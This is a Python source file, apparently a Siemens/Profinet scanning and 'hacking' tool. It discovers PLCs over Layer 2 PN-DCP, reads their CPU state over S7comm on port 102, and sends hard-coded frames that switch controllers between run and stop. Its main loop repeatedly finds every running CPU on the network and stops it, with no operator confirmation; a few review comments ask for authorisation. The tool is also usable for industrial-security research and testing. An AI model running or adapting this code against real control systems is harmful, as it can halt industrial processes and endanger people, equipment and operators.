485 lines
22 KiB
Python
485 lines
22 KiB
Python
#! /usr/bin/env python3
|
|
r"""
|
|
Copyright 2022 Photubias(c)
|
|
|
|
This program is free software: you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License as published by
|
|
the Free Software Foundation, either version 3 of the License, or
|
|
(at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
|
|
(Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/
|
|
python profinet_scanner.py [-i interface]
|
|
|
|
DLL Library import based on: https://code.google.com/p/winpcapy/
|
|
|
|
Prerequisites: WinPcap (Windows) or libpcap (Linux) installed
|
|
|
|
File name SiemensScan.py
|
|
written by tijl[dot]deneut[at]howest[dot]be for IC4
|
|
--- Profinet Scanner ---
|
|
It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices,
|
|
then list their info (detected only via DCP)
|
|
Then give you the option to change network settings for any of them
|
|
|
|
--- Siemens Hacker ---
|
|
It also performs detailed scanning using S7Comm.
|
|
Furthermore, this script reads inputs AND writes & reads outputs.
|
|
"""
|
|
import os
|
|
import re
|
|
import socket
|
|
import string
|
|
import struct
|
|
import sys
|
|
import time
|
|
from binascii import hexlify, unhexlify
|
|
from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \
|
|
byref, create_string_buffer
|
|
from ctypes.util import find_library
|
|
from multiprocessing.pool import ThreadPool
|
|
from pprint import pprint
|
|
from subprocess import Popen, PIPE
|
|
|
|
|
|
##### Classes
|
|
class Sockaddr(Structure):
    """Generic socket address record: an unsigned-short family code plus 14 raw data bytes."""

    _fields_ = [
        ('sa_family', c_ushort),
        ('sa_data', c_char * 14),
    ]
|
|
|
|
|
|
class PcapAddr(Structure):
    """Linked-list node describing one address of a capture interface.

    Every member is a pointer: 'next' leads to the following PcapAddr node,
    the remaining four point at Sockaddr records.
    """


# The field list is attached after the class statement because 'next' has to
# reference PcapAddr itself, which does not exist while the class body runs.
PcapAddr._fields_ = [('next', POINTER(PcapAddr))] + [
    (field_name, POINTER(Sockaddr))
    for field_name in ('addr', 'netmask', 'broadaddr', 'dstaddr')
]
|
|
|
|
|
|
class PcapIf(Structure):
    """Linked-list node describing one capture interface.

    This is the element type that pcap_findalldevs is declared to fill in.
    """


# Attached after the class statement because 'next' is a pointer to PcapIf itself.
PcapIf._fields_ = [
    ('next', POINTER(PcapIf)),
    ('name', c_char_p),
    ('description', c_char_p),
    ('addresses', POINTER(PcapAddr)),
    ('flags', c_int),
]
|
|
|
|
|
|
class Timeval(Structure):
    """Timestamp record made of two C longs: 'tv_sec' and 'tv_usec'."""

    # No self-reference here, so the fields can be declared directly in the class body.
    _fields_ = [
        ('tv_sec', c_long),
        ('tv_usec', c_long),
    ]
|
|
|
|
|
|
class PcapPkthdr(Structure):
    """Per-packet header handed back by pcap_next_ex: timestamp plus two length fields."""


# NOTE(review): both lengths are declared as signed c_int here; libpcap documents
# them as unsigned 32-bit values - confirm whether this matters for your captures.
PcapPkthdr._fields_ = [
    ('ts', Timeval),
    ('caplen', c_int),
    ('len', c_int),
]
|
|
|
|
|
|
##### Initialize Pcap
|
|
# Load the packet-capture library into the module-level handle `_lib`.
# If the library cannot be found, an explanation is printed, the user is asked
# to press Enter, and the process exits with status 1.
if os.name == 'nt':
    try:
        # wpcap.dll is loaded by bare name, so the working directory is switched
        # to the Npcap folder first. This changes the cwd of the whole process.
        os.chdir('C:/Windows/System32/Npcap')
        _lib = CDLL('wpcap.dll')
    except OSError:
        # Only "folder missing" / "DLL could not be loaded" is handled here, so
        # that Ctrl-C or SystemExit are no longer swallowed by this handler.
        print('Error: WinPcap/Npcap not found!')
        print('Please download here: https://nmap.org/npcap/')
        input('Press [Enter] to close')
        sys.exit(1)
else:
    pcaplibrary = find_library('pcap')
    if pcaplibrary is None or str(pcaplibrary) == '':
        print('Error: Pcap library not found!')
        print('Please install with: e.g. apt install libpcap0.8')
        input('Press [Enter] to close')
        sys.exit(1)
    _lib = CDLL(pcaplibrary)
|
|
|
|
## Opaque capture handle as returned by pcap_open_live
_PCAP_HANDLE = POINTER(c_void_p)


def _bind_pcap(name, restype, argtypes):
    """Look up *name* in the loaded pcap library and attach its ctypes signature."""
    func = getattr(_lib, name)
    func.restype = restype
    func.argtypes = argtypes
    return func


## List all devices: (pointer to the head of the PcapIf list, error buffer)
pcap_findalldevs = _bind_pcap('pcap_findalldevs', c_int, [POINTER(POINTER(PcapIf)), c_char_p])

## Open a device: char *device, int snaplen, int promisc, int to_ms, char *errbuf
##   snaplen - maximum size of packets to capture in bytes
##   promisc - set card in promiscuous mode?
##   to_ms   - time to wait for packets in milliseconds before read times out
##   errbuf  - if something happens, place error string here
pcap_open_live = _bind_pcap('pcap_open_live', _PCAP_HANDLE, [c_char_p, c_int, c_int, c_int, c_char_p])

## Send a raw packet: pcap device handle, packetdata, packetlength
pcap_sendpacket = _bind_pcap('pcap_sendpacket', c_int, [_PCAP_HANDLE, POINTER(c_ubyte), c_int])

## Close a device
pcap_close = _bind_pcap('pcap_close', None, [_PCAP_HANDLE])

## Get the error message belonging to a device handle
pcap_geterr = _bind_pcap('pcap_geterr', c_char_p, [_PCAP_HANDLE])

## Get the next packet: handle, out-pointer to the header, out-pointer to the packet bytes
pcap_next_ex = _bind_pcap('pcap_next_ex', c_int,
                          [_PCAP_HANDLE, POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))])
|
|
|
|
##### Variables
|
|
# Number of seconds scan_network() listens for responses after sending the discovery packet.
iDiscoverTimeout = 2
|
|
|
|
|
|
##### Functions
|
|
def get_all_interfaces():
    """Return the local network interfaces that have a usable MAC address.

    The result is a list with one five-element list per interface:
        [0] = adapter name  (e.g. Ethernet or eth0)
        [1] = current IP    (e.g. 192.168.0.2, '' when none was found on Windows)
        [2] = current MAC   (e.g. ff:ee:dd:cc:bb:aa)
        [3] = device name   (e.g. Intel 82575LM, Windows only, otherwise '')
        [4] = device GUID   (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only, otherwise '')

    Windows data comes from `getmac` and `netsh`, everything else from `ip address`.
    """

    def add_to_arr(array, adapter, ip, mac, device, winguid):
        # When no or bad MAC address (e.g. PPP adapter), do not add
        if len(mac) == 17:
            array.append([adapter, ip, mac, device, winguid])
        return array

    interfaces = []
    if os.name == 'nt':  # This should work on Windows
        # The context manager closes the pipe and reaps the child process.
        with Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE) as proc:
            lines = proc.stdout.readlines()
        for interface in lines:
            # errors='ignore' matches the netsh decoding below and avoids a crash
            # on adapter names that are not valid UTF-8.
            intarr = interface.decode(errors='ignore').split(',')
            if len(intarr) < 4:
                continue  # blank or malformed row
            adapter = intarr[0].replace('"', '')
            devicename = intarr[1].replace('"', '')
            mac = intarr[2].replace('"', '').lower().replace('-', ':')
            winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:]
            # NOTE(review): the adapter name is pasted into a shell command line;
            # it originates from getmac on the local machine.
            with Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True,
                       stdout=PIPE) as addr_proc:
                addr_lines = addr_proc.stdout.readlines()
            try:
                ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
                                addr_lines[0].decode(errors='ignore').replace(' ', ''))[0]
            except IndexError:
                # No output line, or no IPv4 address in the first line
                ip = ''
            interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid)
    else:  # And this on any Linux
        with Popen(
                "for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done",
                shell=True, stdout=PIPE) as proc:
            lines = proc.stdout.readlines()
        for interface in lines:
            intarr = interface.decode().split()
            if len(intarr) < 3:
                continue  ## Fewer than name + IP + MAC: not usable for scanning
            # The MAC is always the last field; an interface with several IPv4
            # addresses prints more than one address in between.
            interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[-1], '', '')

    return interfaces
|
|
|
|
|
|
## Expects s_data as a hex string like 01020304050607 and returns a ctypes c_ubyte array
|
|
def create_packet(s_data):
    """Turn a hex string such as '01020304050607' into a ctypes c_ubyte array of those bytes."""
    raw_bytes = unhexlify(s_data)
    # Size the array type to the payload and fill it positionally, one int per byte.
    return (c_ubyte * len(raw_bytes))(*raw_bytes)
|
|
|
|
|
|
## Actually sends a packet
|
|
def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''):
    """Build one Ethernet frame from hex strings and send it on a pcap device.

    The frame is the concatenation dstmac + srcmac + ethertype + payload:
      * '88cc' (LLDP): fixed destination MAC and fixed payload.
      * '8100' (PN-DCP discovery): fixed destination MAC and fixed payload.
      * '8892' with bool_set_network: a fixed prefix and suffix wrapped around
        s_network_data_to_set; s_dstmac is used as given.
      * '8892' without bool_set_network: s_network_data_to_set is the payload
        as-is; s_dstmac is used as given.

    :param b_npfdevice: pcap device name as bytes
    :param s_ethertype: ethertype as four hex characters
    :param s_srcmac: source MAC as twelve hex characters, no separators
    :return: the ctypes byte array that was sent
    :raises ValueError: for an ethertype that is not listed above
    Exits the process with status 1 when the device cannot be opened or the send fails.
    """
    if s_ethertype == '88cc':  # LLDP Packet
        s_dstmac = '0180c200000e'
        s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000'
    elif s_ethertype == '8100':  # PN-DCP, Profinet Discovery Packet, sEthertype '8100'
        s_dstmac = '010ecf000000'
        s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000'
    elif s_ethertype == '8892' and bool_set_network:
        ## Create packet to set networkdata, expect data in hexstring
        s_data = (
            'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000'
        ).replace(' ', '')
    elif s_ethertype == '8892':
        ## Custom packet with s_network_data_to_set as the data (including length)
        s_data = s_network_data_to_set
    else:
        # Previously this fell through and failed later with an unbound s_data.
        raise ValueError('Unsupported ethertype: %r' % (s_ethertype,))

    ## Get packet as a ctypes byte array
    arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data)

    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    buf_errbuf = create_string_buffer(256)
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nError: Please use sudo!\n')
        sys.exit(1)

    try:
        if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0:
            # Read the message while the handle is still open, and decode it so
            # the user does not see a b'...' repr.
            s_error = pcap_geterr(handle_pcap_dev)
            if isinstance(s_error, bytes):
                s_error = s_error.decode(errors='replace')
            print('\nError sending the packet: %s\n' % s_error)
            sys.exit(1)
    finally:
        # Runs on success, on sys.exit and on any exception, so the handle never leaks.
        pcap_close(handle_pcap_dev)
    return arr_byte_packet
|
|
|
|
|
|
## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds
|
|
def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False):
    """Capture frames on a pcap device for a limited time and return the matching ones.

    A frame matches when bytes 12-13 equal s_ethertype and bytes 0-5 (the
    destination MAC) equal s_srcmac, i.e. the frame is addressed to this host.
    Both comparisons are case-insensitive on the hex text.

    :param b_npfdevice: pcap device name as bytes
    :param i_timeout: capture duration in seconds
    :param s_srcmac: own MAC as twelve hex characters, no separators
    :param s_ethertype: ethertype as four hex characters
    :param stop_on_receive: return as soon as the first matching frame is stored
    :return: list of frames, each a list of byte values
    Exits the process with status 1 when the device cannot be opened.
    """
    arr_received_raw_data = []
    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    buf_errbuf = create_string_buffer(256)
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice))
        sys.exit(1)

    ptr_header = POINTER(PcapPkthdr)()
    ptr_pkt_data = POINTER(c_ubyte)()
    s_wanted_type = s_ethertype.lower()
    s_wanted_mac = s_srcmac.lower()
    fl_timer = time.time() + int(i_timeout)
    i_packets = 0
    try:
        while True:
            i_timeleft = int(round(fl_timer - time.time(), 0))
            status('Received packets: %s, time left: %i \r' % (str(i_packets), i_timeleft))
            if i_timeleft <= 0:
                break  ## Regular timeout elapsed

            i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
            if i_receivedpacket < 0:
                break  ## Error or end of capture
            if i_receivedpacket == 0:
                # Read timeout: no packet was delivered, so the header and data
                # pointers must not be dereferenced (they are stale or NULL).
                continue

            i_packets += 1
            # Only 'caplen' bytes are present in the capture buffer.
            lst_rawdata = ptr_pkt_data[0:ptr_header.contents.caplen]
            s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower()
            s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower()
            if s_packettype == s_wanted_type and s_wanted_mac == s_targetmac:
                arr_received_raw_data.append(lst_rawdata)
                if stop_on_receive:
                    break
    finally:
        pcap_close(handle_pcap_dev)
    return arr_received_raw_data
|
|
|
|
|
|
## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py)
|
|
## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
|
|
def parse_response(s_hexdata, s_mac):
    """Parse the hex text of a PN-DCP identify response into a device dictionary.

    :param s_hexdata: hex string starting at the Profinet FrameID (Ethernet
        header already removed); must begin with 'feff'
    :param s_mac: MAC address of the responding device, stored unchanged
    :return: dict with the keys mac_address, type_of_station, name_of_station,
        vendor_id, device_id, device_role, ip_address, subnet_mask,
        standard_gateway (the string 'None' when absent) and hardware, firmware
        (always None here)

    Block parsing is limited to the number of bytes announced in the length
    field at header bytes 10-11, so trailing Ethernet padding is never read as a
    block. Truncated blocks are skipped instead of raising.
    """
    arr_device = {
        'mac_address': s_mac,
        'type_of_station': 'None',
        'name_of_station': 'None',
        'vendor_id': 'None',
        'device_id': 'None',
        'device_role': 'None',
        'ip_address': 'None',
        'subnet_mask': 'None',
        'standard_gateway': 'None',
        'hardware': None,
        'firmware': None,
    }
    ## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF)
    if not str(s_hexdata[:4]).lower() == 'feff':
        print('Error: this data is not a proper DCP response?')
        return arr_device

    def _text(hex_payload):
        # Drop NUL bytes (leading info bytes / padding) and map every remaining byte to one character.
        return unhexlify(hex_payload).replace(b'\x00', b'').decode('latin-1')

    def _ipv4(hex_octets):
        return socket.inet_ntoa(unhexlify(hex_octets))

    i_header_chars = 12 * 2  # (Static) offset to where first block starts
    if len(s_hexdata) < i_header_chars:
        return arr_device  # header incomplete, nothing to parse
    i_data_length = int(s_hexdata[20:24], 16)
    data_to_parse = s_hexdata[i_header_chars:i_header_chars + i_data_length * 2]

    ## Each block: 2 bytes id, 2 bytes length, then <length> bytes of content
    while len(data_to_parse) >= 4 * 2:
        block_length = int(data_to_parse[2 * 2:4 * 2], 16)
        block = data_to_parse[:(4 + block_length) * 2]

        ## Parse the block
        block_id = str(block[:2 * 2])
        if block_id == '0201':
            arr_device['type_of_station'] = _text(block[4 * 2:])
        elif block_id == '0202':
            arr_device['name_of_station'] = _text(block[4 * 2:])
        elif block_id == '0203':
            arr_device['vendor_id'] = str(block[6 * 2:8 * 2])
            arr_device['device_id'] = str(block[8 * 2:10 * 2])
        elif block_id == '0204':
            arr_device['device_role'] = str(block[6 * 2:7 * 2])
        elif block_id == '0102' and len(block) >= 18 * 2:
            arr_device['ip_address'] = _ipv4(block[6 * 2:10 * 2])
            arr_device['subnet_mask'] = _ipv4(block[10 * 2:14 * 2])
            arr_device['standard_gateway'] = _ipv4(block[14 * 2:18 * 2])

        ## Maintain the loop: blocks with an odd length are followed by one padding byte
        padding = block_length % 2
        data_to_parse = data_to_parse[(4 + block_length + padding) * 2:]

    return arr_device
|
|
|
|
|
|
def status(msg):
    """Write msg to standard error without adding a newline and flush immediately."""
    err_stream = sys.stderr
    err_stream.write(msg)
    err_stream.flush()
|
|
|
|
|
|
def send_and_recv(sock, strdata, sendOnly=False):
    """Send a hex-encoded payload on a connected socket and return one reply.

    :param sock: connected socket object
    :param strdata: payload as hex text; spaces are ignored, case does not matter
    :param sendOnly: when true, return None right after sending
    :return: the bytes of a single recv(65000) call, or None when sendOnly is set
    """
    data = unhexlify(strdata.replace(' ', '').lower())  ## Convert to real bytes (\x00\x00 ...)
    # sendall keeps writing until the whole buffer is out; plain send() may stop early.
    sock.sendall(data)
    if sendOnly:
        return
    return sock.recv(65000)
|
|
|
|
|
|
def get_cpu(device):
    """Query the CPU state of the device at ``device['ip_address']`` over TCP port 102.

    :param device: dict with at least the key 'ip_address'
    :return: 'Unknown' when the TCP connection cannot be made, '' when the COTP
        connection request is not confirmed, 'Stopped' when byte 44 of the read
        response is 0x03, otherwise 'Running'
    Socket errors after the connection has been made (e.g. a receive timeout)
    propagate to the caller. The socket is closed on every exit path.
    """
    s_statee = 'Running'
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)  # 1 second timeout
        try:
            sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102
        except OSError:
            return 'Unknown'

        # Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC)
        cotpconnectresponse = hexlify(
            send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')
        ).decode(errors='ignore')
        ## The sixth byte of a confirming response is d0
        if not cotpconnectresponse[10:12] == 'd0':
            print('COTP Connection Request failed')
            return ''

        ##---- S7 Setup Comm ------------
        ## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-)
        s7setupdata = '32010000020000080000' + 'f0000001000101e0'
        tpktlength = str(hex(int((len(s7setupdata) + 14) / 2)))[2:]
        send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata)

        ##---- S7 Request CPU -----------
        s7readdata = '3207000005000008 000800011204 11440100ff09000404240001'
        tpktlength = str(hex(int((len(s7readdata.replace(' ', '')) + 14) / 2)))[2:]
        s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata)
        if hexlify(s7read[44:45]).decode(errors='ignore') == '03':
            s_statee = 'Stopped'
    return s_statee
|
|
|
|
|
|
def change_cpu(device):
    """Toggle the run state of the CPU at ``device['ip_address']`` over TCP port 102.

    The current state is read with get_cpu() first. When it is 'Stopped' the
    frames marked "Will perform start" are sent, otherwise the alternative
    frames are sent.

    WARNING: this changes the operating state of a live controller. Only use it
    on equipment you are authorized to test.

    :param device: dict with at least the key 'ip_address'
    :return: True when the whole exchange was sent, False when sending the
        '03000042' frame failed
    Errors from connect() and from the other exchanges propagate to the caller.

    NOTE(review): the socket is not closed when one of those errors propagates.
    NOTE(review): the frame lengths in the TPKT headers are hard-coded while
    s_sid is computed - confirm they still match for SIDs that need more digits.
    """
    cur_state = get_cpu(device)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102
    ## CR TPDU
    send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a')
    ## 'SubscriptionContainer'
    sResp = hexlify(send_and_recv(sock,
                                  '030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode(
        errors='ignore')
    # Session id: byte 24 of the response plus 0x80, as hex text padded to an even number of digits
    s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '')
    if len(s_sid) % 2 == 1: s_sid = '0' + s_sid
    # print('Using SID ' + sSID)
    if cur_state == 'Stopped':  ## Will perform start
        send_and_recv(sock,
                      '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ce 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
    else:
        send_and_recv(sock,
                      '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 88 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
    send_and_recv(sock,
                  '0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000')
    send_and_recv(sock,
                  '0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000')
    runloop = True
    print('--- Getting data ---')
    # Drain whatever the device still sends until recv raises (normally the 1 s timeout).
    # NOTE(review): nesting reconstructed from a whitespace-stripped source - it is
    # assumed that only the recv try/except belongs to this loop; confirm.
    # NOTE(review): recv() returning b'' (peer closed) never raises, so this loop
    # would then spin forever; 'response' is never used; the bare excepts also
    # swallow KeyboardInterrupt.
    while runloop:
        try:
            response = sock.recv(65000)
        except:
            runloop = False
    try:
        send_and_recv(sock,
                      '03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000')
    except:
        sock.close()
        return False
    if cur_state == 'Stopped':  ## Will perform start
        send_and_recv(sock,
                      '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 03 000004e88969001200000000896a001300896b00040000000000000072020000')
    else:
        send_and_recv(sock,
                      '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 01 000004e88969001200000000896a001300896b00040000000000000072020000')
    send_and_recv(sock,
                  '0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000')

    sock.close()
    return True
|
|
|
|
|
|
def scan_network(s_adapter, s_macaddr, s_winguid):
    """Send one discovery frame and collect the '8892' answers addressed to this host.

    :param s_adapter: adapter name; used as the pcap device name except on Windows
    :param s_macaddr: own MAC as twelve hex characters, no separators
    :param s_winguid: adapter GUID; on Windows the device is \\Device\\NPF_<GUID>
    :return: tuple (list of received raw frames, pcap device name as bytes)
    """
    ## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0')
    s_device = r'\Device\NPF_' + s_winguid if os.name == 'nt' else s_adapter
    b_npfdevice = s_device.encode()

    print('Building packet')

    ## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LLDP)
    sent_frame = send_raw_packet(b_npfdevice, '8100', s_macaddr)
    print('\nPacket has been sent (', len(sent_frame), ' bytes)', sep='')

    ## Receiving packets as lists of byte values (8892 == device PN_DCP)
    print('\nReceiving packets over ', iDiscoverTimeout, ' seconds ...\n', sep='')
    received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892')

    print()
    print('\nSaved ', len(received_data_arr), ' packets', sep='')
    print()
    return received_data_arr, b_npfdevice
|
|
|
|
|
|
def parse_data(received_data_arr):
    """Turn captured raw frames into device dictionaries, one per frame.

    :param received_data_arr: iterable of frames, each a sequence of byte values
    :return: list of the dictionaries produced by parse_response()
    """
    lst_devices = []
    for raw_frame in received_data_arr:
        frame_hex = hexlify(bytearray(raw_frame)).decode(errors='ignore')
        ## Bytes 6-11 hold the sender's MAC; format it with ':' in between
        mac_hex = frame_hex[6 * 2:12 * 2]
        s_mac = ':'.join(mac_hex[pos:pos + 2] for pos in range(0, len(mac_hex), 2))
        ## Everything after the 14-byte Ethernet header goes to the DCP parser
        lst_devices.append(parse_response(frame_hex[28:], s_mac))
    return lst_devices
|
|
|
|
|
|
def main():
    """Scan through the first detected interface and act on the devices found, forever.

    Each cycle: discover devices, print them, query the CPU state of every
    device, call change_cpu() on those reported as 'Running', then sleep for
    5 seconds.

    NOTE(review): this loop changes the state of every running CPU it finds,
    on every cycle, without any operator confirmation. Only run it against
    equipment you are authorized to test.

    Exits with status 1 when no interface with a usable MAC address is found.
    """
    interfaces = get_all_interfaces()
    if not interfaces:
        # Without this guard the indexing below failed with a bare IndexError.
        print('Error: no network interface with a MAC address found!')
        sys.exit(1)
    s_adapter = interfaces[0][0]  # eg: 'Ethernet 2'
    s_macaddr = interfaces[0][2].replace(':', '')  # eg: 'ab58e0ff585a'
    s_winguid = interfaces[0][4]  # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}'

    while True:
        received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid)
        lst_devices = parse_data(received_data_arr)
        print(f"Found {len(lst_devices)} devices")
        for lst_device in lst_devices:
            pprint(lst_device)
        print("Stopping all CPUs")
        for device in lst_devices:
            current_state = get_cpu(device)
            if current_state == 'Running':
                change_cpu(device)
        time.sleep(5)
|
|
|
|
|
|
# Run the scan loop only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
|